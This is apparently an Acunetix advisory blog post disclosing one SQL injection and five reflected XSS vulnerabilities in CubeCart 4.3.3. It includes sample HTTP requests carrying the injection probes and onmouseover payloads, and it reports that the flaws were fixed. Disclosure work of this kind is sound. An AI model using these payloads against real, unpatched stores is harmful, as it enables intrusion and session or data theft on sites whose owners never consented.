SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3

Note: This article refers to an older version of Acunetix. Click here to download the latest version.

Note: This article refers to an older version of Acunetix. Click here to download the latest version.

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a number of security problems discovered by Acunetix WVS in CubeCart .

CubeCart is a fully featured ecommerce shopping cart solution used by over a million store owners around the world.

The following web vulnerabilities were found in CubeCart version 4.3.3;

  1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
  2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
  3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
  4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.
  5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.
  6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Technical details about each web vulnerability are below:

1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.

Additional details:

SQL query:

Error message:
SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''

Sample HTTP Request:

GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

sql injection cubecart

2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.

Attack details

URL encoded GET input amount was set to ” onmouseover=prompt(949088) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.

Attack details

URL encoded GET input cartId was set to ” onmouseover=prompt(932890) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.

Attack details

URL encoded GET input email was set to ” onmouseover=prompt(908306) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.

Attack details

URL encoded GET input transId was set to ” onmouseover=prompt(998313) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Attack details

URL encoded GET input transStatus was set to ” onmouseover=prompt(923101) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

These vulnerabilities were reported to the CubeCart team on 22/7/2010 via the support system on their website and they were fixed in latest version of CubeCart . If you are using CubeCart, download the latest version from their website.

Share this post
  • Guys, this version is way out of date! This article concerns 4.3.3 but the current release is 4.4.2!!

    Can you test it on that and let us know if you coma across any vulnerabilities?

    • Hi Al,

      I’m Bogdan Calin from Acunetix. The issues reported in this article are the same issues I’ve reported to you on 22 Jul 2010 10:47 AM in your knowledge base.
      These issues were fixed in the latest version. I’ve checked.

  • Leave a Reply

    Your email address will not be published.